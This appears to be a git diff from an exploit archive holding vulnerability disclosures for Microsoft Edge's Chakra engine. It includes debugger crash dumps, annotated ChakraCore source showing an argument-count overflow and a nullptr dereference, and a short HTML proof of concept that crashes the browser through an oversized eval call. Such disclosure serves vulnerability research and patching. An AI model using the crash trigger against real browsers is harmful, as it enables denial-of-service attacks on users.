+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+0:016> g
+
+STATUS_STACK_BUFFER_OVERRUN encountered
+(1590.b70): Break instruction exception - code 80000003 (first chance)
+KERNELBASE!UnhandledExceptionFilter+0x85960:
+00007ffe`9e61c120 cc              int     3
+0:016> kb
+RetAddr           : Args to Child                                                           : Call Site
+00007ffe`811c726a : 00007ffe`814f2820 00007ffe`814f2820 000000d8`b83f9e70 000000d8`b83f9e70 : KERNELBASE!UnhandledExceptionFilter+0x85960
+00007ffe`811c73f9 : 00007ffe`00000000 00007ffe`80f50000 00007ffe`8160e2f0 00007ffe`816c6ea4 : chakra!_raise_securityfailure+0x1a
+00007ffe`811cac98 : 000100d8`fa7ddce2 00007ffe`a1eb92e2 00007ffe`8102aeac 000000d8`00000000 : chakra!_report_gsfailure+0x169
+00007ffe`a1f4a08d : 00000000`00000000 000000d8`b83f8eb0 00000000`00000000 00000000`00000000 : chakra!_GSHandlerCheck_EH+0x38
+00007ffe`a1eb9c58 : 00000000`00000000 00000000`00000000 000002aa`8312dc00 00000000`00000000 : ntdll!RtlpExecuteHandlerForException+0xd
+00007ffe`a1f4910e : 000002aa`8315fbc0 00007ffe`a1ec9f66 000002aa`98205cbb 000000d8`b83f9538 : ntdll!RtlDispatchException+0x368
+00007ffe`8133ba8d : 000002aa`8312a270 000002aa`9820003d 000002aa`8312a270 00000000`00000000 : ntdll!KiUserExceptionDispatcher+0x2e
+00007ffe`8120a2a5 : 000000d8`b83f9d20 000002aa`98205cbb 000000d8`b83f9c60 000002aa`98205cbb : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d
+00007ffe`810fa321 : 000000d8`b83f9d20 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x10fec5
+00007ffe`8102aeac : 000000d8`b83f9d20 000002aa`96ad0000 000000d8`b83f9ea0 000002aa`8312dc00 : chakra!Js::InterpreterStackFrame::Process+0x1b1
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+
+
+-->
+<html>
+<head>
+<title> POC </title>
+</head>
+<script>
+
+var a = '0x42424242,'.repeat(0xFFFF-2); 
+var b = "function Car(){} var car = new Car(a,"+a+"a);";
+eval(b);
+
+</script>
+</html>
\ No newline at end of file
diff --git a/platforms/windows/dos/42467.html b/platforms/windows/dos/42467.html
new file mode 100755
index 000000000..ed5f65a51
--- /dev/null
+++ b/platforms/windows/dos/42467.html
@@ -0,0 +1,419 @@
+<!--
+Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team
+
+The issue could lead a nullptr derefrence besides a stack overflow we metioned previously.
+
+// ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp
+Js::ArgSlot EmitArgList(
+    ParseNode *pnode,
+    Js::RegSlot rhsLocation,
+    Js::RegSlot thisLocation,
+    Js::RegSlot newTargetLocation,
+    BOOL fIsEval,
+    BOOL fAssignRegs,
+    ByteCodeGenerator *byteCodeGenerator,
+    FuncInfo *funcInfo,
+    Js::ProfileId callSiteId,
+    uint16 spreadArgCount = 0,
+    Js::AuxArray<uint32> **spreadIndices = nullptr)
+{
+    // This function emits the arguments for a call.
+    // ArgOut's with uses immediately following defs.
+
+    EmitArgListStart(thisLocation, byteCodeGenerator, funcInfo, callSiteId);
+
+    Js::RegSlot evalLocation = Js::Constants::NoRegister;
+
+    //
+    // If Emitting arguments for eval and assigning registers, get a tmpLocation for eval.
+    // This would be used while generating frameDisplay in EmitArgListEnd.
+    //
+    if (fIsEval)
+    {
+        evalLocation = funcInfo->AcquireTmpRegister();
+    }
+
+    if (spreadArgCount > 0)		//spreadArgCount==0 because of overflow****
+    {
+        const size_t extraAlloc = spreadArgCount * sizeof(uint32);
+        Assert(spreadIndices != nullptr);
+        *spreadIndices = AnewPlus(byteCodeGenerator->GetAllocator(), extraAlloc, Js::AuxArray<uint32>, spreadArgCount);        //skip initialization of spreadIndices****
+    }
+
+    size_t argIndex = EmitArgs(pnode, fAssignRegs, byteCodeGenerator, funcInfo, callSiteId, spreadIndices == nullptr ? nullptr : *spreadIndices);
+
+    Js::ArgSlot argumentsCount = EmitArgListEnd(pnode, rhsLocation, thisLocation, evalLocation, newTargetLocation, byteCodeGenerator, funcInfo, argIndex, callSiteId);
+
+    if (fIsEval)
+    {
+        funcInfo->ReleaseTmpRegister(evalLocation);
+    }
+
+    return argumentsCount;
+}
+
+
+// ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp
+size_t EmitArgs(
+    ParseNode *pnode,
+    BOOL fAssignRegs,
+    ByteCodeGenerator *byteCodeGenerator,
+    FuncInfo *funcInfo,
+    Js::ProfileId callSiteId,
+    Js::AuxArray<uint32> *spreadIndices = nullptr
+    )
+{
+    Js::ArgSlot argIndex = 0;
+    Js::ArgSlot spreadIndex = 0;
+
+    if (pnode != nullptr)
+    {
+        while (pnode->nop == knopList)
+        {
+            // If this is a put, the arguments have already been evaluated (see EmitReference).
+            // We just need to emit the ArgOut instructions.
+            if (fAssignRegs)
+            {
+                Emit(pnode->sxBin.pnode1, byteCodeGenerator, funcInfo, false);
+            }
+
+            if (pnode->sxBin.pnode1->nop == knopEllipsis)
+            {
+                Assert(spreadIndices != nullptr);
+                spreadIndices->elements[spreadIndex++] = argIndex + 1; // account for 'this'			//nullptr derefrence****
+                EmitSpreadArgToListBytecodeInstr(byteCodeGenerator, funcInfo, pnode->sxBin.pnode1->location, callSiteId, argIndex);
+            }
+            else
+            {
+                byteCodeGenerator->Writer()->ArgOut<true>(++argIndex, pnode->sxBin.pnode1->location, callSiteId);
+            }
+            if (fAssignRegs)
+            {
+                funcInfo->ReleaseLoc(pnode->sxBin.pnode1);
+            }
+
+            pnode = pnode->sxBin.pnode2;
+        }
+
+        // If this is a put, the call target has already been evaluated (see EmitReference).
+        if (fAssignRegs)
+        {
+            Emit(pnode, byteCodeGenerator, funcInfo, false);
+        }
+
+        if (pnode->nop == knopEllipsis)
+        {
+            Assert(spreadIndices != nullptr);
+            spreadIndices->elements[spreadIndex++] = argIndex + 1; // account for 'this'
+            EmitSpreadArgToListBytecodeInstr(byteCodeGenerator, funcInfo, pnode->location, callSiteId, argIndex);
+        }
+        else
+        {
+            byteCodeGenerator->Writer()->ArgOut<true>(++argIndex, pnode->location, callSiteId);
+        }
+
+        if (fAssignRegs)
+        {
+            funcInfo->ReleaseLoc(pnode);
+        }
+    }
+
+    return argIndex;
+}
+
+Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64
+Copyright (c) Microsoft Corporation. All rights reserved.
+
+*** wait with pending attach
+Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols
+Executable search path is: 
+ModLoad: 00007ff6`56460000 00007ff6`56485000   C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
+ModLoad: 00007ffd`4cba0000 00007ffd`4cd7b000   C:\Windows\SYSTEM32\ntdll.dll
+ModLoad: 00007ffd`4ad90000 00007ffd`4ae3e000   C:\Windows\System32\KERNEL32.DLL
+ModLoad: 00007ffd`49c00000 00007ffd`49e49000   C:\Windows\System32\KERNELBASE.dll
+ModLoad: 00007ffd`475e0000 00007ffd`4765e000   C:\Windows\SYSTEM32\apphelp.dll
+ModLoad: 00007ffd`4a1a0000 00007ffd`4a499000   C:\Windows\System32\combase.dll
+ModLoad: 00007ffd`499b0000 00007ffd`49aa6000   C:\Windows\System32\ucrtbase.dll
+ModLoad: 00007ffd`4b250000 00007ffd`4b375000   C:\Windows\System32\RPCRT4.dll
+ModLoad: 00007ffd`49eb0000 00007ffd`49f1a000   C:\Windows\System32\bcryptPrimitives.dll
+ModLoad: 00007ffd`4a100000 00007ffd`4a19d000   C:\Windows\System32\msvcrt.dll
+ModLoad: 00007ffd`43c40000 00007ffd`43ca0000   C:\Windows\SYSTEM32\wincorlib.DLL
+ModLoad: 00007ffd`4b380000 00007ffd`4b440000   C:\Windows\System32\OLEAUT32.dll
+ModLoad: 00007ffd`49b60000 00007ffd`49bfa000   C:\Windows\System32\msvcp_win.dll
+ModLoad: 00007ffd`490a0000 00007ffd`490b1000   C:\Windows\System32\kernel.appcore.dll
+ModLoad: 00007ffd`2c870000 00007ffd`2cc34000   C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll
+ModLoad: 00007ffd`492b0000 00007ffd`499a2000   C:\Windows\System32\Windows.Storage.dll
+ModLoad: 00007ffd`4b4f0000 00007ffd`4b591000   C:\Windows\System32\advapi32.dll
+ModLoad: 00007ffd`4b1f0000 00007ffd`4b249000   C:\Windows\System32\sechost.dll
+ModLoad: 00007ffd`4cb40000 00007ffd`4cb91000   C:\Windows\System32\shlwapi.dll
+ModLoad: 00007ffd`4a8e0000 00007ffd`4a907000   C:\Windows\System32\GDI32.dll
+ModLoad: 00007ffd`49f20000 00007ffd`4a0a8000   C:\Windows\System32\gdi32full.dll
+ModLoad: 00007ffd`4c9f0000 00007ffd`4cb3a000   C:\Windows\System32\USER32.dll
+ModLoad: 00007ffd`41cb0000 00007ffd`41f36000   C:\Windows\SYSTEM32\iertutil.dll
+ModLoad: 00007ffd`490c0000 00007ffd`490de000   C:\Windows\System32\win32u.dll
+ModLoad: 00007ffd`4a9c0000 00007ffd`4aa6a000   C:\Windows\System32\shcore.dll
+ModLoad: 00007ffd`49030000 00007ffd`4907c000   C:\Windows\System32\powrprof.dll
+ModLoad: 00007ffd`49010000 00007ffd`49025000   C:\Windows\System32\profapi.dll
+ModLoad: 00007ffd`48310000 00007ffd`48341000   C:\Windows\SYSTEM32\ntmarta.dll
+ModLoad: 00007ffd`48f10000 00007ffd`48f39000   C:\Windows\SYSTEM32\USERENV.dll
+ModLoad: 00007ffd`486a0000 00007ffd`48744000   C:\Windows\SYSTEM32\DNSAPI.dll
+ModLoad: 00007ffd`4b030000 00007ffd`4b09c000   C:\Windows\System32\WS2_32.dll
+ModLoad: 00007ffd`4a9b0000 00007ffd`4a9b8000   C:\Windows\System32\NSI.dll
+ModLoad: 00007ffd`38c70000 00007ffd`38c96000   C:\Windows\SYSTEM32\clipc.dll
+ModLoad: 00007ffd`48a60000 00007ffd`48a77000   C:\Windows\SYSTEM32\cryptsp.dll
+ModLoad: 00007ffd`4b4a0000 00007ffd`4b4cd000   C:\Windows\System32\IMM32.DLL
+ModLoad: 00007ffd`48660000 00007ffd`48697000   C:\Windows\SYSTEM32\IPHLPAPI.DLL
+ModLoad: 00007ffd`479c0000 00007ffd`47b30000   C:\Windows\SYSTEM32\twinapi.appcore.dll
+ModLoad: 00007ffd`48ee0000 00007ffd`48f05000   C:\Windows\SYSTEM32\bcrypt.dll
+ModLoad: 00007ffd`48140000 00007ffd`48161000   C:\Windows\SYSTEM32\profext.dll
+ModLoad: 00007ffd`38a20000 00007ffd`38a94000   C:\Windows\SYSTEM32\msiso.dll
+ModLoad: 00007ffd`3e660000 00007ffd`3e682000   C:\Windows\SYSTEM32\EShims.dll
+ModLoad: 00007ffd`3d710000 00007ffd`3d72b000   C:\Windows\SYSTEM32\MPR.dll
+ModLoad: 00007ffd`4b0a0000 00007ffd`4b1e5000   C:\Windows\System32\ole32.dll
+ModLoad: 00007ffd`47830000 00007ffd`478c5000   C:\Windows\system32\uxtheme.dll
+ModLoad: 00007ffd`379c0000 00007ffd`37a61000   C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
+ModLoad: 00007ffd`2df90000 00007ffd`2f641000   C:\Windows\SYSTEM32\edgehtml.dll
+ModLoad: 00007ffd`2d730000 00007ffd`2df1b000   C:\Windows\SYSTEM32\chakra.dll
+ModLoad: 00007ffd`45500000 00007ffd`45639000   C:\Windows\SYSTEM32\wintypes.dll
+ModLoad: 00007ffd`3e0a0000 00007ffd`3e0df000   C:\Windows\SYSTEM32\MLANG.dll
+ModLoad: 00007ffd`45c20000 00007ffd`45c96000   C:\Windows\SYSTEM32\policymanager.dll
+ModLoad: 00007ffd`45b90000 00007ffd`45c1f000   C:\Windows\SYSTEM32\msvcp110_win.dll
+ModLoad: 00007ffd`45fb0000 00007ffd`46146000   C:\Windows\SYSTEM32\PROPSYS.dll
+ModLoad: 00007ffd`39b50000 00007ffd`39c1b000   C:\Windows\System32\ieproxy.dll
+ModLoad: 00007ffd`436b0000 00007ffd`437b6000   C:\Windows\System32\Windows.UI.dll
+ModLoad: 00007ffd`435e0000 00007ffd`43662000   C:\Windows\SYSTEM32\TextInputFramework.dll
+ModLoad: 00007ffd`46eb0000 00007ffd`46f93000   C:\Windows\SYSTEM32\CoreMessaging.dll
+ModLoad: 00007ffd`44b90000 00007ffd`44e62000   C:\Windows\SYSTEM32\CoreUIComponents.dll
+ModLoad: 00007ffd`45b70000 00007ffd`45b85000   C:\Windows\SYSTEM32\usermgrcli.dll
+ModLoad: 00007ffd`44040000 00007ffd`44571000   C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
+ModLoad: 00007ffd`4b5a0000 00007ffd`4c9d7000   C:\Windows\System32\shell32.dll
+ModLoad: 00007ffd`4a0b0000 00007ffd`4a0f9000   C:\Windows\System32\cfgmgr32.dll
+ModLoad: 00007ffd`46150000 00007ffd`4617a000   C:\Windows\SYSTEM32\dwmapi.dll
+ModLoad: 00007ffd`39200000 00007ffd`3952e000   C:\Windows\SYSTEM32\WININET.dll
+ModLoad: 00007ffd`4ac20000 00007ffd`4ad86000   C:\Windows\System32\msctf.dll
+ModLoad: 00007ffd`48f40000 00007ffd`48f70000   C:\Windows\SYSTEM32\SspiCli.dll
+ModLoad: 00007ffd`43860000 00007ffd`43962000   C:\Windows\SYSTEM32\mrmcorer.dll
+ModLoad: 00007ffd`36760000 00007ffd`36770000   C:\Windows\SYSTEM32\tokenbinding.dll
+ModLoad: 00007ffd`43ba0000 00007ffd`43c09000   C:\Windows\SYSTEM32\Bcp47Langs.dll
+ModLoad: 00007ffd`396b0000 00007ffd`396cb000   C:\Windows\SYSTEM32\ondemandconnroutehelper.dll
+ModLoad: 00007ffd`400d0000 00007ffd`401a7000   C:\Windows\SYSTEM32\winhttp.dll
+ModLoad: 00007ffd`488c0000 00007ffd`4891c000   C:\Windows\system32\mswsock.dll
+ModLoad: 00007ffd`42450000 00007ffd`4245b000   C:\Windows\SYSTEM32\WINNSI.DLL
+ModLoad: 00007ffd`41940000 00007ffd`41b08000   C:\Windows\SYSTEM32\urlmon.dll
+ModLoad: 00007ffd`48a80000 00007ffd`48a8b000   C:\Windows\SYSTEM32\CRYPTBASE.DLL
+ModLoad: 00007ffd`36f20000 00007ffd`36f3a000   C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll
+ModLoad: 00007ffd`38ae0000 00007ffd`38c6a000   C:\Windows\SYSTEM32\ieapfltr.dll
+ModLoad: 00007ffd`47670000 00007ffd`4768d000   C:\Windows\System32\rmclient.dll
+ModLoad: 00007ffd`34410000 00007ffd`34457000   C:\Windows\system32\dataexchange.dll
+ModLoad: 00007ffd`46fa0000 00007ffd`470c2000   C:\Windows\SYSTEM32\dcomp.dll
+ModLoad: 00007ffd`46620000 00007ffd`468ff000   C:\Windows\SYSTEM32\d3d11.dll
+ModLoad: 00007ffd`47e80000 00007ffd`47f24000   C:\Windows\SYSTEM32\dxgi.dll
+ModLoad: 00007ffd`35bb0000 00007ffd`35bc8000   C:\Windows\System32\UiaManager.dll
+ModLoad: 00007ffd`37e60000 00007ffd`37ee2000   C:\Windows\system32\twinapi.dll
+ModLoad: 00007ffd`2d700000 00007ffd`2d728000   C:\Windows\SYSTEM32\srpapi.dll
+ModLoad: 00007ffd`490e0000 00007ffd`492a9000   C:\Windows\System32\CRYPT32.dll
+ModLoad: 00007ffd`49080000 00007ffd`49091000   C:\Windows\System32\MSASN1.dll
+ModLoad: 00007ffd`30870000 00007ffd`308ea000   C:\Windows\SYSTEM32\windows.ui.core.textinput.dll
+ModLoad: 00007ffd`385b0000 00007ffd`3860d000   C:\Windows\SYSTEM32\ninput.dll
+ModLoad: 00007ffd`46900000 00007ffd`46ea4000   C:\Windows\SYSTEM32\d2d1.dll
+ModLoad: 00007ffd`40390000 00007ffd`4064f000   C:\Windows\SYSTEM32\DWrite.dll
+ModLoad: 00007ffd`30470000 00007ffd`304ca000   C:\Windows\System32\Windows.Graphics.dll
+ModLoad: 00007ffd`2d6f0000 00007ffd`2d6ff000   C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll
+ModLoad: 00007ffd`448a0000 00007ffd`448e2000   C:\Windows\SYSTEM32\vm3dum64.dll
+ModLoad: 00007ffd`44680000 00007ffd`446e7000   C:\Windows\SYSTEM32\D3D10Level9.dll
+ModLoad: 00007ffd`37780000 00007ffd`377eb000   C:\Windows\System32\oleacc.dll
+ModLoad: 00007ffd`2d6e0000 00007ffd`2d6f0000   C:\Windows\system32\msimtf.dll
+ModLoad: 00007ffd`40030000 00007ffd`400b8000   C:\Windows\system32\directmanipulation.dll
+ModLoad: 00007ffd`39af0000 00007ffd`39b04000   C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll
+ModLoad: 00007ffd`3f270000 00007ffd`3f2a8000   C:\Windows\System32\smartscreenps.dll
+ModLoad: 00007ffd`377f0000 00007ffd`379b5000   C:\Windows\System32\uiautomationcore.dll
+ModLoad: 00007ffd`40200000 00007ffd`40388000   C:\Windows\SYSTEM32\windows.globalization.dll
+(18bc.14e0): Access violation - code c0000005 (!!! second chance !!!)
+chakra!EmitArgs+0xddda3:
+00007ffd`2da3132f 41894c8504      mov     dword ptr [r13+rax*4+4],ecx ds:00000000`00000004=????????
+0:016> r
+rax=0000000000000000 rbx=0000006a8f7faeb0 rcx=0000000000000001
+rdx=0000019df75e3040 rsi=0000000000000002 rdi=0000006a8f7fa9c0
+rip=00007ffd2da3132f rsp=0000006a8f7fb0f0 rbp=0000006a8f7fb8f0
+ r8=0000000000000000  r9=0000000000000000 r10=0000000000000009
+r11=0000019df75ff04d r12=0000000000000001 r13=0000000000000000
+r14=0000006a8f7fb8f0 r15=0000000000000000
